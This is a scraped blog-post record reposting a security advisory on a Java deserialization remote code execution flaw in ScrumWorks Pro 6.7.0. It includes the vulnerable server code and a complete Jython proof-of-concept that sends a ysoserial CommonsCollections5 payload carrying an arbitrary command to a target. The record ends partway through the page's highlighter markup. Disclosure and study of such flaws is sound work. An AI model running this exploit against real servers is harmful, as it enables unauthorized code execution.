{"id":8870,"date":"2017-08-22T14:19:22","date_gmt":"2017-08-22T22:19:22","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2017\/08\/22\/news-2643\/"},"modified":"2017-08-22T14:19:22","modified_gmt":"2017-08-22T22:19:22","slug":"news-2643","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2017\/08\/22\/news-2643\/","title":{"rendered":"SSD Advisory \u2013 ScrumWorks Pro Remote Code Execution"},"content":{"rendered":"<p><strong>Credit to Author: SSD \/ Maor Schwartz| Date: Tue, 22 Aug 2017 05:22:12 +0000<\/strong><\/p>\n<div class=\"entry-content\">\n<p><strong>Want to get paid for a vulnerability similar to this one?<\/strong><br \/>Contact us at: <a href=\"mailto:sxsxd@bxexyxoxnxdxsxexcxuxrxixtxy.com\" onmouseover=\"this.href=this.href.replace(\/x\/g,'');\" id=\"a-href-3387\">sxsxdx@xbxexyxoxnxdxsxexcxuxrxixtxy.xcom<\/a><\/p>\n<p><script>var obj = jQuery('#a-href-3387');if(obj[0]) { obj[0].innerText = obj[0].innerText.replace(\/x\/g, ''); }<\/script>  \t\t<\/p>\n<div class=\"pf-content\">\n<p><strong>Vulnerability Summary<\/strong><br \/> The following advisory describes a remote code execution vulnerability found in ScrumWorks Pro version 6.7.0.<\/p>\n<p>&#8220;CollabNet ScrumWorks Pro is an Agile Project Management for Developers, Scrum Masters, and Business&#8221;.  A trial version can be downloaded from the vendor: https:\/\/www.collab.net\/products\/scrumworks<\/p>\n<p><strong>Credit<\/strong><br \/> A security researcher from, Siberas, has reported this vulnerability to Beyond Security\u2019s SecuriTeam Secure Disclosure program.<\/p>\n<p><strong>Vendor response<\/strong><br \/> Collab was informed of the vulnerability, and responded to it that &#8211; &#8220;We had a check with our Scrumworks Engineering team and after initial analysis, they&#8217;ve concluded that the Vulnerability which was reported will be considered of least priority from our end and it might be fixed in the future, however, We can&#8217;t assure you on the time line as our team is working with more priority issues at the moment.&#8221;<\/p>\n<p><span id=\"more-3387\"><\/span><\/p>\n<p><strong>Vulnerability details<\/strong><br \/> ScumWorks Pro provides a web interface and a Java client that can be started via Java Web Start (JNLP).<\/p>\n<p>The Java client sends serialized Java objects to the \/UFC endpoint of the application server. <\/p>\n<p>These requests are handled by the class <em>com.danube.scrumworks.controller.FrontController<\/em>, method &#8220;<em>doPost<\/em>&#8220;:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-599cade9cd29c967419713\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> &#8212;  protected void doPost(HttpServletRequest paramHttpServletRequest, HttpServletResponse paramHttpServletResponse)      throws IOException    {      ServerSession localServerSession = getSession(paramHttpServletRequest);            AbstractExecutableCommand localAbstractExecutableCommand = null;      ObjectInputStream localObjectInputStream = new ObjectInputStream(new GZIPInputStream(paramHttpServletRequest.getInputStream()));      try      {        AbstractCommand localAbstractCommand = (AbstractCommand)localObjectInputStream.readObject();        localAbstractExecutableCommand = (AbstractExecutableCommand)Class.forName(getExecutableCommandName(localAbstractCommand)).newInstance();                paramHttpServletResponse.addHeader(&#8220;X-SWP-responseType&#8221;, &#8220;object&#8221;);        if (localServerSession.isExpired())        {          paramHttpServletRequest.getSession().invalidate();          sendResponse(paramHttpServletResponse, new ReAuthenticateException());          return;        }        localObject1 = ControllerUtils.extractUserFromAuthorizationHeader(paramHttpServletRequest);        String str = localObject1 == null ? null : ((UserTO)localObject1).getUserName();        LOGGER.info(&#8220;[User: &#8221; + str + &#8220;] command: &#8221; + localAbstractCommand);        if (Maintenance.isMaintenanceMode()) {          sendResponse(paramHttpServletResponse, ServerException.getMaintenanceModeException());        } else {          runCommandIfAuthorized((UserTO)localObject1, localAbstractExecutableCommand, localAbstractCommand, paramHttpServletResponse);        }      }      catch (ServerException localServerException)      {        localServerException.printStackTrace();        sendResponse(paramHttpServletResponse, localServerException);      }      catch (InvalidClassException localInvalidClassException)      {        LOGGER.error(&#8220;An outdated client tried to send a command.  Please log out and restart the client.&#8221;);        sendResponse(paramHttpServletResponse, new ServerException(&#8220;The server has been updated.  Please relaunch your client.&#8221;, localInvalidClassException));      }      catch (Exception localException)      {        LOGGER.debug(&#8220;error handling request&#8221;, localException);        Object localObject1 = unwrapException(localException);        LOGGER.error(&#8220;error executing a command&#8221;, (Throwable)localObject1);        if (localAbstractExecutableCommand != null) {          sendResponse(paramHttpServletResponse, ServerException.getMisconfiguredServerException((Exception)localObject1));        }      }      finally      {        localObjectInputStream.close();      }    }    &#8212;<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">  \t\t\t\t  \t\t\t<\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0065 seconds] -->  <\/p>\n<p>Before the first try block, the http POST body is ZIP decompressed and then used to read a Java object via <em>readObject<\/em>, making the application vulnerable to Java deserialization attacks if a suitable gadget is available. As many other applications, ScrumWorks Pro ships with a vulnerable version of Apache <em>CommonsCollections<\/em> (3.2.1) that can be used to execute arbitrary code with the permissions of the ScrumWorks application server.<\/p>\n<p><strong>Proof of concept<\/strong><br \/> The following Python script requires jython (at least version 2.5.3) and a local copy of the ysoserial library (<a href=\"https:\/\/github.com\/frohoff\/ysoserial\" target=\"_blank\">https:\/\/github.com\/frohoff\/ysoserial<\/a>).<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-599cade9cd2a7048494444\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> &#8212;  #  # Scrumworks Java Deserialization Remote Code Execution PoC  #   import httplib  import urllib  import sys    import binascii    # load the ysoserial.jar file   sys.path.append(&#8220;.\/ysoserial.jar&#8221;)    from ysoserial import *  from ysoserial.payloads import *    # ZIP support  from java.io import ByteArrayOutputStream  from java.io import ObjectOutputStream  from java.util.zip import GZIPOutputStream      print &#8220;Scrumworks Java Deserialization Remote Code Execution PoC&#8221;  print &#8220;=========================================================&#8221;    if len(sys.argv) != 4:    print &#8220;usage: &#8221; + sys.argv[0] + &#8221; host port commandn&#8221;      exit(3)    payloadName = &#8220;CommonsCollections5&#8221;  payloadClass = ObjectPayload.Utils.getPayloadClass(payloadName);    if payloadClass is None:    print(&#8220;Can&#8217;t load ysoserial payload class&#8221;)    exit(2);    # serialize payload  payload = payloadClass.newInstance()  exploitObject = payload.getObject(sys.argv[3])    # create streams  byteStream = ByteArrayOutputStream()  zipStream = GZIPOutputStream(byteStream)  objectStream = ObjectOutputStream(zipStream)   objectStream.writeObject(exploitObject)    # close streams  objectStream.flush()  objectStream.close()  zipStream.close()  byteStream.close()    # http request  print &#8220;sending serialized command&#8221;  conn = httplib.HTTPConnection(sys.argv[1] + &#8220;:&#8221; + sys.argv[2])  conn.request(&#8220;POST&#8221;, &#8220;\/scrumworks\/UFC-poc-&#8220;, byteStream.toByteArray())  response = conn.getresponse()  conn.close()  print &#8220;done&#8221;  &#8212;<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-599cade9cd2a7048494444-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-599cade9cd2a7048494444-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-599cade9cd2a7048494444-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-599cade9cd2a7048494444-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-599cade9cd2a7048494444-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-599cade9cd2a7048494444-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-599cade9cd2a7048494444-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-599cade9cd2a7048494444-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-599cade9cd2a7048494444-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-599cade9cd2a7048494444-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-599cade9cd2a7048494444-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-599cade9cd2a7048494444-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-599cade9cd2a7048494444-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-599cade9cd2a7048494444-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-599cade9cd2a7048494444-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-599cade9cd2a7048494444-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-599cade9cd2a7048494444-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-599cade9cd2a7048494444-18\">18<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-599cade9cd2a7048494444-19\">19<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-599cade9cd2a7048494444-20\">20<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-599cade9cd2a7048494444-21\">21<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-599cade9cd2a7048494444-22\">22<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-599cade9cd2a7048494444-23\">23<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-599cade9cd2a7048494444-24\">24<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-599cade9cd2a7048494444-25\">25<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-599cade9cd2a7048494444-26\">26<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-599cade9cd2a7048494444-27\">27<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-599cade9cd2a7048494444-28\">28<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-599cade9cd2a7048494444-29\">29<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-599cade9cd2a7048494444-30\">30<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-599cade9cd2a7048494444-31\">31<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-599cade9cd2a7048494444-32\">32<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-599cade9cd2a7048494444-33\">33<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-599cade9cd2a7048494444-34\">34<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-599cade9cd2a7048494444-35\">35<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-599cade9cd2a7048494444-36\">36<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-599cade9cd2a7048494444-37\">37<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-599cade9cd2a7048494444-38\">38<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-599cade9cd2a7048494444-39\">39<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-599cade9cd2a7048494444-40\">40<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-599cade9cd2a7048494444-41\">41<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-599cade9cd2a7048494444-42\">42<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-599cade9cd2a7048494444-43\">43<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-599cade9cd2a7048494444-44\">44<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-599cade9cd2a7048494444-45\">45<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-599cade9cd2a7048494444-46\">46<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-599cade9cd2a7048494444-47\">47<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-599cade9cd2a7048494444-48\">48<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-599cade9cd2a7048494444-49\">49<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-599cade9cd2a7048494444-50\">50<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-599cade9cd2a7048494444-51\">51<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-599cade9cd2a7048494444-52\">52<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-599cade9cd2a7048494444-53\">53<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-599cade9cd2a7048494444-54\">54<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-599cade9cd2a7048494444-55\">55<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-599cade9cd2a7048494444-56\">56<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-599cade9cd2a7048494444-57\">57<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-599cade9cd2a7048494444-58\">58<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-599cade9cd2a7048494444-59\">59<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-599cade9cd2a7048494444-60\">60<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-599cade9cd2a7048494444-1\"><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8211;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-599cade9cd2a7048494444-2\"><span class=\"crayon-p\">#<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-599cade9cd2a7048494444-3\"><span class=\"crayon-p\"># Scrumworks Java Deserialization Remote Code Execution PoC<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-599cade9cd2a7048494444-4\"><span class=\"crayon-p\"># <\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-599cade9cd2a7048494444-5\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">httplib<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-599cade9cd2a7048494444-6\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">urllib<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-599cade9cd2a7048494444-7\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">sys<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-599cade9cd2a7048494444-8\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-599cade9cd2a7048494444-9\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-v\">binascii<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-599cade9cd2a7048494444-10\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-599cade9cd2a7048494444-11\"><span class=\"crayon-p\"># load the ysoserial.jar file <\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-599cade9cd2a7048494444-12\"><span class=\"crayon-v\">sys<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">path<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">append<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;.\/ysoserial.jar&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-599cade9cd2a7048494444-13\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-599cade9cd2a7048494444-14\"><span class=\"crayon-e\">from <\/span><span class=\"crayon-e\">ysoserial <\/span><span class=\"crayon-e\">import *<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-599cade9cd2a7048494444-15\"><span class=\"crayon-e\">from <\/span><span class=\"crayon-v\">ysoserial<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">payloads <\/span><span class=\"crayon-e\">import *<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-599cade9cd2a7048494444-16\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-599cade9cd2a7048494444-17\"><span class=\"crayon-p\"># ZIP support<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-599cade9cd2a7048494444-18\"><span class=\"crayon-e\">from <\/span><span class=\"crayon-v\">java<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">io <\/span><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">ByteArrayOutputStream<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-599cade9cd2a7048494444-19\"><span class=\"crayon-e\">from <\/span><span class=\"crayon-v\">java<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">io <\/span><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">ObjectOutputStream<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-599cade9cd2a7048494444-20\"><span class=\"crayon-e\">from <\/span><span class=\"crayon-v\">java<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">util<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">zip <\/span><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">GZIPOutputStream<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-599cade9cd2a7048494444-21\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-599cade9cd2a7048494444-22\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-599cade9cd2a7048494444-23\"><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;Scrumworks Java Deserialization Remote Code Execution PoC&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-599cade9cd2a7048494444-24\"><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;=========================================================&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-599cade9cd2a7048494444-25\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-599cade9cd2a7048494444-26\"><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">len<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">sys<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">argv<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">!=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">4<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-599cade9cd2a7048494444-27\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;usage: &#8220;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">sys<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">argv<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8221; host port commandn&#8221;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-599cade9cd2a7048494444-28\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-e\">exit<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">3<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-599cade9cd2a7048494444-29\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-599cade9cd2a7048494444-30\"><span class=\"crayon-v\">payloadName<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;CommonsCollections5&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-599cade9cd2a7048494444-31\"><span class=\"crayon-v\">payloadClass<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ObjectPayload<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">Utils<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">getPayloadClass<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">payloadName<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-599cade9cd2a7048494444-32\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-599cade9cd2a7048494444-33\"><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">payloadClass <\/span><span class=\"crayon-st\">is<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">None<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-599cade9cd2a7048494444-34\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-e\">print<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;Can&#8217;t load ysoserial payload class&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-599cade9cd2a7048494444-35\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-e\">exit<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">2<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-599cade9cd2a7048494444-36\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-599cade9cd2a7048494444-37\"><span class=\"crayon-p\"># serialize payload<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-599cade9cd2a7048494444-38\"><span class=\"crayon-v\">payload<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">payloadClass<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">newInstance<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-599cade9cd2a7048494444-39\"><span class=\"crayon-v\">exploitObject<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">payload<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">getObject<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">sys<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">argv<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">3<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-599cade9cd2a7048494444-40\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-599cade9cd2a7048494444-41\"><span class=\"crayon-p\"># create streams<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-599cade9cd2a7048494444-42\"><span class=\"crayon-v\">byteStream<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">ByteArrayOutputStream<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-599cade9cd2a7048494444-43\"><span class=\"crayon-v\">zipStream<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">GZIPOutputStream<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">byteStream<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-599cade9cd2a7048494444-44\"><span class=\"crayon-v\">objectStream<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">ObjectOutputStream<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">zipStream<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-599cade9cd2a7048494444-45\"><span class=\"crayon-v\">objectStream<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">writeObject<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">exploitObject<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-599cade9cd2a7048494444-46\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-599cade9cd2a7048494444-47\"><span class=\"crayon-p\"># close streams<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-599cade9cd2a7048494444-48\"><span class=\"crayon-v\">objectStream<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">flush<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-599cade9cd2a7048494444-49\"><span class=\"crayon-v\">objectStream<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">close<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-599cade9cd2a7048494444-50\"><span class=\"crayon-v\">zipStream<\/span><span class=\"crayon-sy\">.<\/span><span 